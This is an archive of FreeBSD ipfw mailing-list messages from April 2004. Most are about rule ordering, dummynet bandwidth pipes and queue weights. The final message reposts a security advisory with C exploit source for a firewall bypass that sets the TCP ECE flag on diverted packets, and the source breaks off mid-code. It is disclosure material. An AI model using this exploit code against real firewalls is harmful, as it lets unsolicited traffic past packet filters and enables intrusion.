From owner-freebsd-ipfw@FreeBSD.ORG Mon Apr 12 00:54:14 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2BD4016A4CE for ; Mon, 12 Apr 2004 00:54:14 -0700 (PDT) Received: from calypso.bi.lt (calypso.bi.lt [213.226.153.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8636843D1D for ; Mon, 12 Apr 2004 00:54:13 -0700 (PDT) (envelope-from hugle@vkt.lt) Received: by calypso.bi.lt (Postfix, from userid 506) id 9A54D598BD0; Mon, 12 Apr 2004 10:54:14 +0300 (EEST) X-Original-To: freebsd-ipfw@freebsd.org Received: from vkt-dell (unknown [213.226.136.193]) by calypso.bi.lt (Postfix) with ESMTP id 5FE39598B49 for ; Mon, 12 Apr 2004 10:54:14 +0300 (EEST) Date: Mon, 12 Apr 2004 10:54:14 +0300 From: hugle X-Mailer: The Bat! (v2.01) X-Priority: 3 (Normal) Message-ID: <172205822897.20040412105414@vkt.lt> To: freebsd-ipfw@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: ipfw <> ipf can I change the order packets get in? X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: hugle List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 12 Apr 2004 07:54:14 -0000 Hello all. I've found this patch: http://unia.3lo.lublin.pl/~pawmal/freebsd/ip_output-ipfw-ipf.diff this patch should change the order in which packets go via, ipfw or ipf first.. could oneone give me .diff for in ipfw > ipf out ipf > ipfw and 2nd.diff for in ipf > ipfw out ipfw > ipf i mean to translate these code into such codes:) thanks thanks. -- Best regards,Hugle From owner-freebsd-ipfw@FreeBSD.ORG Mon Apr 12 11:01:52 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9930816A4CE for ; Mon, 12 Apr 2004 11:01:52 -0700 (PDT) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 92CFE43D53 for ; Mon, 12 Apr 2004 11:01:52 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: from freefall.freebsd.org (peter@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.10/8.12.10) with ESMTP id i3CI1qbv084806 for ; Mon, 12 Apr 2004 11:01:52 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.12.10/8.12.10/Submit) id i3CI1pp0084796 for ipfw@freebsd.org; Mon, 12 Apr 2004 11:01:51 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 12 Apr 2004 11:01:51 -0700 (PDT) Message-Id: <200404121801.i3CI1pp0084796@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: ipfw@FreeBSD.org Subject: Current problem reports assigned to you X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 12 Apr 2004 18:01:52 -0000 Current FreeBSD problem reports Critical problems Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [2002/12/27] kern/46557 ipfw ipfw pipe show fails with lots of queues o [2003/04/22] kern/51274 ipfw ipfw2 create dynamic rules with parent nu f [2003/04/24] kern/51341 ipfw ipfw rule 'deny icmp from any to any icmp o [2004/03/03] misc/63724 ipfw IPFW2 Queues dont t work o [2004/03/13] kern/64240 ipfw IPFW tee terminates rule processing 5 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- a [2001/04/13] kern/26534 ipfw Add an option to ipfw to log gid/uid of w o [2002/12/07] kern/46080 ipfw [PATCH] logamount in ipfw2 does not defau o [2002/12/10] kern/46159 ipfw ipfw dynamic rules lifetime feature o [2002/12/27] kern/46564 ipfw IPFilter and IPFW processing order is not o [2003/02/11] kern/48172 ipfw ipfw does not log size and flags o [2003/03/10] kern/49086 ipfw [patch] Make ipfw2 log to different syslo o [2003/03/12] bin/49959 ipfw ipfw tee port rule skips parsing next rul o [2003/04/09] bin/50749 ipfw ipfw2 incorrectly parses ports and port r o [2003/08/25] kern/55984 ipfw [patch] time based firewalling support fo o [2003/12/29] kern/60719 ipfw ipfw: Headerless fragments generate cryp o [2004/01/12] kern/61259 ipfw [patch] make "ipfw tee" work as intended o [2004/02/09] kern/62598 ipfw no logging on ipfw loadable module o [2004/03/08] kern/63961 ipfw ipfw2 uid matching doesn't work correctly 13 problems total. From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 13 08:06:30 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3F23616A4CE for ; Tue, 13 Apr 2004 08:06:30 -0700 (PDT) Received: from mailgw.dgrp.sk (mailgw.dgrp.sk [195.28.127.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6F8FE43D1D for ; Tue, 13 Apr 2004 08:06:28 -0700 (PDT) (envelope-from koren@tempest.sk) Received: by mailgw.dgrp.sk (Postfix, from userid 1003) id 6C4074FD93; Tue, 13 Apr 2004 17:06:26 +0200 (CEST) Received: from domino1.tempest.sk (domino1.tempest.sk [195.28.100.38]) by mailgw.dgrp.sk (Postfix) with ESMTP id 04F184FD92 for ; Tue, 13 Apr 2004 17:06:26 +0200 (CEST) Received: from lk106.tempest.sk ([195.28.109.36]) by domino1.tempest.sk (Lotus Domino Release 6.5.1IF1) with ESMTP id 2004041317062429-1031 ; Tue, 13 Apr 2004 17:06:24 +0200 Received: from lk106.tempest.sk (localhost [127.0.0.1]) by lk106.tempest.sk (8.12.10/8.12.5) with ESMTP id i3DF6HBp031893; Tue, 13 Apr 2004 17:06:17 +0200 (CEST) (envelope-from koren@lk106.tempest.sk) Received: (from koren@localhost) by lk106.tempest.sk (8.12.10/8.12.10/Submit) id i3DF6G20031890; Tue, 13 Apr 2004 17:06:16 +0200 (CEST) (envelope-from koren) Date: Tue, 13 Apr 2004 17:06:16 +0200 (CEST) Message-Id: <200404131506.i3DF6G20031890@lk106.tempest.sk> From: Ludo Koren To: ipfw@FreeBSD.org X-MIMETrack: Itemize by SMTP Server on Domino1/DGRP(Release 6.5.1IF1|March 16, 2004) at 13.04.2004 17:06:24,at 13.04.2004 17:06:26, Serialize complete at 13.04.2004 17:06:26 X-Spam-Checker-Version: SpamAssassin 2.61 (1.212.2.1-2003-12-09-exp) on mailgw X-Spam-Status: No, hits=0.0 required=5.0 tests=none autolearn=no version=2.61 X-Spam-Level: Subject: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 13 Apr 2004 15:06:30 -0000 Hi. I am running ipfw on 5.2.1-RELEASE-p1. The relevant part of the ipfw configuration follows: add check-state pipe 10 config bw 64Kbit/s pipe 20 config bw 256Kbit/s pipe 30 config bw 8Kbit/s queue 10 config pipe 10 weight 100 queue 20 config pipe 20 weight 1 queue 30 config pipe 30 weight 1 .... # Allow SMTP add pass tcp from A to B 25 keep-state add pass tcp from B to A dst-port 25 in via xl0 add pass tcp from A 25 to B in recv xl1 add pipe 20 tcp from B to A dst-port 25 out xmit xl1 keep-state add pass tcp from C to B 25 keep-state add pass tcp from B to C dst-port 25 in via xl0 add pass tcp from C 25 to B in recv xl1 add pipe 20 tcp from B to C dst-port 25 out xmit xl1 keep-state where the A,B,C addresses are not assigned to local interfaces. The xl0 is on the local LAN, the xl1 is connected to the router and WAN. If I watch packets (netstat -w 10 -I xl1) flowing through xl1, I see numbers are correct (~32000 bytes per second). MRTG on the router shows just half throughput, i.e. 128Kb/s. If I reconfigure pipe 20 to 512Kbit/s or 0Kbit/s, the MRTG shows 256Kbit/s. Could you point to me what I did wrong? Thank you very much in advance. lk From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 13 09:17:39 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B733716A4CE for ; Tue, 13 Apr 2004 09:17:39 -0700 (PDT) Received: from xorpc.icir.org (xorpc.icir.org [192.150.187.68]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8C9DC43D4C for ; Tue, 13 Apr 2004 09:17:39 -0700 (PDT) (envelope-from rizzo@icir.org) Received: from xorpc.icir.org (localhost [127.0.0.1]) by xorpc.icir.org (8.12.9p1/8.12.8) with ESMTP id i3DGHYgd099942; Tue, 13 Apr 2004 09:17:34 -0700 (PDT) (envelope-from rizzo@xorpc.icir.org) Received: (from rizzo@localhost) by xorpc.icir.org (8.12.9p1/8.12.3/Submit) id i3DGHYjN099941; Tue, 13 Apr 2004 09:17:34 -0700 (PDT) (envelope-from rizzo) Date: Tue, 13 Apr 2004 09:17:34 -0700 From: Luigi Rizzo To: Ludo Koren Message-ID: <20040413091734.A98975@xorpc.icir.org> References: <200404131506.i3DF6G20031890@lk106.tempest.sk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200404131506.i3DF6G20031890@lk106.tempest.sk>; from lk@tempest.sk on Tue, Apr 13, 2004 at 05:06:16PM +0200 cc: ipfw@freebsd.org Subject: Re: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 13 Apr 2004 16:17:39 -0000 i think it is pilot error. Be warned that dynamic rules only match addresses and ports, so once a rule is installed it will match traffic both in and out. If you want to select on other attributes you have to do it before you hit any keep-state or check-state rule. I don't know if it matches recent reports about dummynet on 5.2.1 giving half the bandwidth, but i just checked locally and it does work as expected -- the bandwidth is correct (with a correct ipfw config, that is :) cheers luigi On Tue, Apr 13, 2004 at 05:06:16PM +0200, Ludo Koren wrote: > > Hi. > > I am running ipfw on 5.2.1-RELEASE-p1. > > The relevant part of the ipfw configuration follows: > > add check-state > pipe 10 config bw 64Kbit/s > pipe 20 config bw 256Kbit/s > pipe 30 config bw 8Kbit/s > queue 10 config pipe 10 weight 100 > queue 20 config pipe 20 weight 1 > queue 30 config pipe 30 weight 1 > .... > > # Allow SMTP > add pass tcp from A to B 25 keep-state > add pass tcp from B to A dst-port 25 in via xl0 > add pass tcp from A 25 to B in recv xl1 > add pipe 20 tcp from B to A dst-port 25 out xmit xl1 keep-state > add pass tcp from C to B 25 keep-state > add pass tcp from B to C dst-port 25 in via xl0 > add pass tcp from C 25 to B in recv xl1 > add pipe 20 tcp from B to C dst-port 25 out xmit xl1 keep-state > > where the A,B,C addresses are not assigned to local interfaces. The > xl0 is on the local LAN, the xl1 is connected to the router and > WAN. If I watch packets (netstat -w 10 -I xl1) flowing through xl1, I > see numbers are correct (~32000 bytes per second). MRTG on the router > shows just half throughput, i.e. 128Kb/s. If I reconfigure pipe 20 to > 512Kbit/s or 0Kbit/s, the MRTG shows 256Kbit/s. > > Could you point to me what I did wrong? > > Thank you very much in advance. > > lk > _______________________________________________ > freebsd-ipfw@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-ipfw > To unsubscribe, send any mail to "freebsd-ipfw-unsubscribe@freebsd.org" From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 13 09:53:33 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7C42B16A4CE for ; Tue, 13 Apr 2004 09:53:33 -0700 (PDT) Received: from mailgw.dgrp.sk (mailgw.dgrp.sk [195.28.127.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id D970A43D5C for ; Tue, 13 Apr 2004 09:53:32 -0700 (PDT) (envelope-from koren@tempest.sk) Received: by mailgw.dgrp.sk (Postfix, from userid 1003) id 1ACB74FD87; Tue, 13 Apr 2004 18:53:32 +0200 (CEST) Received: from domino1.tempest.sk (domino1.tempest.sk [195.28.100.38]) by mailgw.dgrp.sk (Postfix) with ESMTP id A847B4FD85; Tue, 13 Apr 2004 18:53:31 +0200 (CEST) Received: from lk106.tempest.sk ([195.28.109.36]) by domino1.tempest.sk (Lotus Domino Release 6.5.1IF1) with ESMTP id 2004041318532986-1057 ; Tue, 13 Apr 2004 18:53:29 +0200 Received: from lk106.tempest.sk (localhost [127.0.0.1]) by lk106.tempest.sk (8.12.10/8.12.5) with ESMTP id i3DGrMBp057737; Tue, 13 Apr 2004 18:53:22 +0200 (CEST) (envelope-from koren@lk106.tempest.sk) Received: (from koren@localhost) by lk106.tempest.sk (8.12.10/8.12.10/Submit) id i3DGrLb7057734; Tue, 13 Apr 2004 18:53:21 +0200 (CEST) (envelope-from koren) Date: Tue, 13 Apr 2004 18:53:21 +0200 (CEST) Message-Id: <200404131653.i3DGrLb7057734@lk106.tempest.sk> From: Ludo Koren To: rizzo@icir.org In-reply-to: <20040413091734.A98975@xorpc.icir.org> (message from Luigi Rizzo on Tue, 13 Apr 2004 09:17:34 -0700) X-MIMETrack: Itemize by SMTP Server on Domino1/DGRP(Release 6.5.1IF1|March 16, 2004) at 13.04.2004 18:53:29,at 13.04.2004 18:53:31, Serialize complete at 13.04.2004 18:53:31 X-Spam-Checker-Version: SpamAssassin 2.61 (1.212.2.1-2003-12-09-exp) on mailgw X-Spam-Status: No, hits=0.0 required=5.0 tests=none autolearn=no version=2.61 X-Spam-Level: cc: ipfw@freebsd.org Subject: Re: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 13 Apr 2004 16:53:33 -0000 > i think it is pilot error. I do not argue. yes, it probably is. > Be warned that dynamic rules only match addresses and ports, so > once a rule is installed it will match traffic both in and out. > If you want to select on other attributes you have to do it > before you hit any keep-state or check-state rule. > I don't know if it matches recent reports about dummynet on > 5.2.1 giving half the bandwidth, but i just checked locally and > it does work as expected -- the bandwidth is correct (with a > correct ipfw config, that is :) I just cannot put together rules, that do what I want. If I omit keep-state from the rule: add pipe 20 tcp from B to A dst-port 25 out xmit xl1 keep-state it stops working. Basically, I am lost... > cheers luigi lk From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 13 10:09:11 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6489A16A4CE for ; Tue, 13 Apr 2004 10:09:11 -0700 (PDT) Received: from franklin-belle.com (adsl-65-68-247-73.dsl.crchtx.swbell.net [65.68.247.73]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0F54543D3F for ; Tue, 13 Apr 2004 10:09:11 -0700 (PDT) (envelope-from jacks@sage-american.com) Received: from sagea (sagea.sage-american [10.0.0.3]) by franklin-belle.com (8.12.8p2/8.12.8) with SMTP id i3DH98Z9020551; Tue, 13 Apr 2004 12:09:09 -0500 (CDT) (envelope-from jacks@sage-american.com) Message-Id: <3.0.5.32.20040413120905.01f334c8@10.0.0.15> X-Sender: jacks@10.0.0.15 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Tue, 13 Apr 2004 12:09:05 -0500 To: Luigi Rizzo , Ludo Koren From: "Jack L. Stone" In-Reply-To: <20040413091734.A98975@xorpc.icir.org> References: <200404131506.i3DF6G20031890@lk106.tempest.sk> <200404131506.i3DF6G20031890@lk106.tempest.sk> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Spam-Status: No, hits=0.4 required=4.5 tests=AWL autolearn=ham version=2.63-sageame.rules_v3.1 X-Spam-Checker-Version: SpamAssassin 2.63-sageame.rules_v3.1 (2004-01-11) on franklin-belle.com cc: ipfw@freebsd.org Subject: Re: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 13 Apr 2004 17:09:11 -0000 TopPost: Hi, Luigi & List: Pardon me for tagging along on this thread, but my question is somewhat related. Being a newbie to using dummynet, I haven't yet figured how to chose & apply the proper "weight" which ranges from 1-100. The man pages are very brief on this and I haven't seen anything else in my searches. Any tips appreciated.... At 09:17 AM 4.13.2004 -0700, Luigi Rizzo wrote: >i think it is pilot error. > >Be warned that dynamic rules only match addresses and ports, >so once a rule is installed it will match traffic both >in and out. >If you want to select on other attributes you have to do >it before you hit any keep-state or check-state rule. > >I don't know if it matches recent reports about dummynet on 5.2.1 >giving half the bandwidth, but i just checked locally and it >does work as expected -- the bandwidth is correct (with a correct >ipfw config, that is :) > > cheers > luigi > Best regards, Jack L. Stone, Administrator Sage American http://www.sage-american.com jacks@sage-american.com From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 13 10:13:46 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5421216A4CE for ; Tue, 13 Apr 2004 10:13:46 -0700 (PDT) Received: from xorpc.icir.org (xorpc.icir.org [192.150.187.68]) by mx1.FreeBSD.org (Postfix) with ESMTP id 44CD143D1D for ; Tue, 13 Apr 2004 10:13:46 -0700 (PDT) (envelope-from rizzo@icir.org) Received: from xorpc.icir.org (localhost [127.0.0.1]) by xorpc.icir.org (8.12.9p1/8.12.8) with ESMTP id i3DHDkgd003705; Tue, 13 Apr 2004 10:13:46 -0700 (PDT) (envelope-from rizzo@xorpc.icir.org) Received: (from rizzo@localhost) by xorpc.icir.org (8.12.9p1/8.12.3/Submit) id i3DHDkAp003704; Tue, 13 Apr 2004 10:13:46 -0700 (PDT) (envelope-from rizzo) Date: Tue, 13 Apr 2004 10:13:46 -0700 From: Luigi Rizzo To: "Jack L. Stone" Message-ID: <20040413101346.B98975@xorpc.icir.org> References: <200404131506.i3DF6G20031890@lk106.tempest.sk> <200404131506.i3DF6G20031890@lk106.tempest.sk> <20040413091734.A98975@xorpc.icir.org> <3.0.5.32.20040413120905.01f334c8@10.0.0.15> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3.0.5.32.20040413120905.01f334c8@10.0.0.15>; from jacks@sage-american.com on Tue, Apr 13, 2004 at 12:09:05PM -0500 cc: Ludo Koren cc: ipfw@freebsd.org Subject: Re: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 13 Apr 2004 17:13:46 -0000 On Tue, Apr 13, 2004 at 12:09:05PM -0500, Jack L. Stone wrote: > TopPost: > Hi, Luigi & List: > Pardon me for tagging along on this thread, but my question is somewhat > related. > > Being a newbie to using dummynet, I haven't yet figured how to chose & > apply the proper "weight" which ranges from 1-100. The man pages are very > brief on this and I haven't seen anything else in my searches. weights are only relative to each other, they are not absolute values. The only thing that counts is the ratio among queues connected to the same pipe, so pick what you like. cheers luigi From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 13 19:25:53 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8871916A4CE for ; Tue, 13 Apr 2004 19:25:53 -0700 (PDT) Received: from server1.aaawebsolution.com (aaawebsolution.com [209.61.189.249]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0712C43D69 for ; Tue, 13 Apr 2004 19:25:53 -0700 (PDT) (envelope-from tscrum@aaawebsolution.com) Received: from wolf (fl-well-u1-c3c-157.pbc.adelphia.net [24.54.174.157]) (authenticated)i3E2Pq927537; Tue, 13 Apr 2004 21:25:52 -0500 From: "Thomas S. Crum - AAA Web Solution, Inc." To: "'Jack L. Stone'" Date: Tue, 13 Apr 2004 22:25:43 -0400 Message-ID: <003401c421c7$ccf8c340$6466a8c0@wolf> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0035_01C421A6.45E72340" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4024 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2727.1300 In-Reply-To: <3.0.5.32.20040413120905.01f334c8@10.0.0.15> X-Content-Filtered-By: Mailman/MimeDel 2.1.1 cc: ipfw@freebsd.org Subject: RE: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 02:25:53 -0000 This is a multi-part message in MIME format. ------=_NextPart_000_0035_01C421A6.45E72340 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Also, Luigi has a helpful tutorial at http://info.iet.unipi.it/~luigi/ip_dummynet/ Best, Thomas S. Crum Senior Technical Associate tscrum@aaawebsolution.com Toll-free: (800) 834-0626 AAA Web Solution, Inc. 11924 W Forest Hill Boulevard Building 22 - Mailstop 200 Wellington, FL 33414 USA Providing full-service website design, maintenance, hosting, and marketing. No task is too small or enterprise too large for us to help you! ------------------------------------------------------------------------ ---- -----Original Message----- From: owner-freebsd-ipfw@freebsd.org [mailto:owner-freebsd-ipfw@freebsd.org] On Behalf Of Jack L. Stone Sent: Tuesday, April 13, 2004 1:09 PM To: Luigi Rizzo; Ludo Koren Cc: ipfw@freebsd.org Subject: Re: limiting bandwith TopPost: Hi, Luigi & List: Pardon me for tagging along on this thread, but my question is somewhat related. Being a newbie to using dummynet, I haven't yet figured how to chose & apply the proper "weight" which ranges from 1-100. The man pages are very brief on this and I haven't seen anything else in my searches. Any tips appreciated.... At 09:17 AM 4.13.2004 -0700, Luigi Rizzo wrote: >i think it is pilot error. > >Be warned that dynamic rules only match addresses and ports, >so once a rule is installed it will match traffic both >in and out. >If you want to select on other attributes you have to do >it before you hit any keep-state or check-state rule. > >I don't know if it matches recent reports about dummynet on 5.2.1 >giving half the bandwidth, but i just checked locally and it >does work as expected -- the bandwidth is correct (with a correct >ipfw config, that is :) > > cheers > luigi > Best regards, Jack L. Stone, Administrator Sage American http://www.sage-american.com jacks@sage-american.com _______________________________________________ freebsd-ipfw@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-ipfw To unsubscribe, send any mail to "freebsd-ipfw-unsubscribe@freebsd.org" ------=_NextPart_000_0035_01C421A6.45E72340-- From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 01:20:02 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2883F16A4CE for ; Wed, 14 Apr 2004 01:20:02 -0700 (PDT) Received: from pitt.sitel.com.ua (pitt.sitel.com.ua [217.27.144.5]) by mx1.FreeBSD.org (Postfix) with ESMTP id 24EA143D2D for ; Wed, 14 Apr 2004 01:20:01 -0700 (PDT) (envelope-from sd@buc.com.ua) Received: from arrow.buc.com.ua (arrow.sitel.com.ua [217.27.145.61]) by pitt.sitel.com.ua (8.12.9p2/8.12.9) with ESMTP id i3E8JtSr087461 for ; Wed, 14 Apr 2004 11:19:57 +0300 (EEST) (envelope-from sd@buc.com.ua) Received: by arrow.buc.com.ua (Postfix, from userid 1002) id 6D8CD9002A; Wed, 14 Apr 2004 11:19:25 +0000 (GMT) Received: from buc.com.ua (unknown [192.168.13.97]) by arrow.buc.com.ua (Postfix) with ESMTP id 516CC8FF4B for ; Wed, 14 Apr 2004 11:19:25 +0000 (GMT) Message-ID: <407D1E4F.4000500@buc.com.ua> Date: Wed, 14 Apr 2004 11:19:43 +0000 From: Dmitry Surovtsev User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020610 X-Accept-Language: ru, uk, en-us, en MIME-Version: 1.0 To: freebsd-ipfw@freebsd.org References: <200403171648.i2HGmWwS015144@freefall.freebsd.org> Content-Type: text/plain; charset=KOI8-R; format=flowed Content-Transfer-Encoding: 7bit Subject: IPFW ECE Firewall Bypassing Exploit X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: sd@buc.com.ua List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 08:20:02 -0000 securiteam news (http://www.securiteam.com/exploits/5CP0B0UCKU.html): A vulnerability in FreeBSD's implementation of packet filtering for IPv4 and IPv6 has been found. The vulnerability allows specially crafted packets that are not part of an established connection to go through the firewall. These special packets must have the ECE flag set, which is in the TCP reserved options field. Details Exploit: /* * FreeBSD ipfw + TCP ECE flag exploit. * Plathond for Sensepost 2001/01/25 */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define DIVERT_PORT 7000 #define FALSE 0 #define TRUE 1 #define CKSUM_CARRY(x) \ (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff)) typedef unsigned char Boolean; static unsigned char pbuf[IP_MAXPACKET]; static unsigned long plen = 0; static int psock = -1; static struct sockaddr_in paddr; /* * These are stolen from libnet. */ int in_cksum(u_short *addr, int len) { int sum; int nleft; u_short ans; u_short *w; sum = 0; ans = 0; nleft = len; w = addr; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&ans) = *(u_char *)w; sum += ans; } return (sum); } void do_cksum(unsigned char *buf, int protocol, int len) { struct ip *ip; unsigned long ip_hl = 0; unsigned long sum = 0; ip = (struct ip *)buf; ip_hl = ip->ip_hl << 2; switch(protocol) { case IPPROTO_TCP: { struct tcphdr *tcp; tcp = (struct tcphdr *)(buf + ip_hl); tcp->th_sum = 0; sum = in_cksum((u_short *)&(ip->ip_src), 8); sum += ntohs(IPPROTO_TCP + len); sum += in_cksum((u_short *)tcp, len); tcp->th_sum = CKSUM_CARRY(sum); break; } default: return; } return; } void flushpacket(int fd) { int nR; nR = sendto(fd, pbuf, plen, 0, (struct sockaddr*) &paddr, sizeof(paddr)); if (nR != plen) { if (errno == ENOBUFS) return; if (errno == EMSGSIZE) { fprintf(stderr, "Need to implement frag.\n"); return; } else { fprintf(stderr, "Failed to write packet.\n"); return; } } psock = -1; } void handle_input(int sock) { int nR = 0; int addrsize = 0; struct ip *ip; Boolean fIsOutput = FALSE; unsigned int ip_hl = 0, tcp_hl = 0; unsigned int ip_data_len = 0; struct tcphdr *tcp = NULL; addrsize = sizeof(struct sockaddr_in); nR = recvfrom(sock, pbuf, sizeof(pbuf), 0, (struct sockaddr *)&paddr, &addrsize); if (nR == -1) { if (errno != EINTR) fprintf(stderr, "Warning : recvfrom() failed.\n"); goto over; } ip = (struct ip *)pbuf; ip_hl = ip->ip_hl << 2; /* Check if this is input or output */ if (paddr.sin_addr.s_addr == INADDR_ANY) fIsOutput = TRUE; else fIsOutput = FALSE; /* We are only handling TCP packets */ if (ip->ip_p != IPPROTO_TCP) goto over; /* Get the TCP header */ tcp = (struct tcphdr *) (pbuf + ip_hl); tcp_hl = tcp->th_off << 2; ip_data_len = ntohs(ip->ip_len) - ip_hl; /* Sanity check packet length */ if (ip_data_len <= 0) goto over; /* Add ECE and CWR flags to TCP header */ tcp->th_flags |= (0x40 | 0x80); /* Compute new checksum */ do_cksum(pbuf, IPPROTO_TCP, ip_data_len); /* Write packet back */ plen = nR; psock = sock; flushpacket(sock); over: return; } int main(int argc, char **argv) { int inoutsock = -1; fd_set rfs, wfs; int fdmax = -1; struct sockaddr_in addr; int rc; /* Create divert sockets */ if ((inoutsock = socket(PF_INET, SOCK_RAW, IPPROTO_DIVERT)) == -1) { fprintf(stderr, "socket() failed, exiting\n"); exit(1); } /* Bind socket */ addr.sin_family = AF_INET; addr.sin_addr.s_addr = INADDR_ANY; addr.sin_port = ntohs(DIVERT_PORT); if (bind(inoutsock, (struct sockaddr*) &addr, sizeof(struct sockaddr_in)) == -1) { fprintf(stderr, "Unable to bind socket, exiting\n"); exit(1); } while (1) { FD_ZERO(&rfs); FD_ZERO(&wfs); if (psock != -1) FD_SET(psock, &wfs); FD_SET(inoutsock, &rfs); if (inoutsock > psock) fdmax = inoutsock; else fdmax = psock; /* Select loop */ rc = select(fdmax + 1, &rfs, &wfs, NULL, NULL); if (rc == -1) { if (errno == EINTR) continue; fprintf(stderr, "select() failed, exiting\n"); exit(1); } /* Check for flush from previous packet */ if (psock != -1) { if 